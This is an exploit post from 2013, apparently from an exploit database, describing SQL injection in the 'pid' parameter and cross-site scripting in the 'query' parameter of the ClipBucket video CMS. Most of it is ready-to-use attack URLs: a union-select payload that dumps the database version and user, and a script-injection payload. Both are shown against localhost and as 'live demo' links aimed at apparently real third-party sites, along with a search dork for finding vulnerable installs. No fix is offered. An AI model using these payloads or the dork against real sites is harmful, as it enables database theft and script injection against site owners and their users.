# Exploit Title : SQL Injection and XSS vulnerability in ClipBucket script
# Date : 01 July 2013
# Exploit Author : 3rr0r1046 IndiShell
# Vendor Homepage : http://clip-bucket.com/
# Category : webapps
# Tested on : Linux
# Dork : "Forged by ClipBucket"
////////////////////
DESCRIPTION
////////////////////
clipbucket is video and photo hosting cms in which user can upload videos and photos
this CMS has SQL injection vulnerability in 'pid' parameter in view_page.php page script
through which attacker can gain info from database by executing arbitrary SQL commands .
There is XSS flaw also exist in search_result.php in 'query ' parameter
//////////////////
POC SQL Injection
//////////////////
Dumping SQL version and user
http://127.0.0.1/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
live demo
1.http://insXafpk.tv/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
2. http://vid4X8.com/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
3. http://koolXspan.com/clip/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10 --+
4. http://X.agro.uba.ar/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
////////////////
POC XSS
////////////////
sample XSS attack url
http://127.0.0.1/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
live demo
1.http://insafpk.tv/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
2.http://comunicacionenvideos.agro.uba.ar/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
3. http://vid48.com/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
4. http://koolspan.com/clip/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
--==[[ Greetz To ]]==--
##########
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,cool toad,cool shavik<br>Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,cyber warrior,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,lovetherisk<br>Suriya Prakash,cyber gladiator,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Mannu, ViKi ,Budhaoo, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,silent hacker and rest of TEAM INDISHELL
##########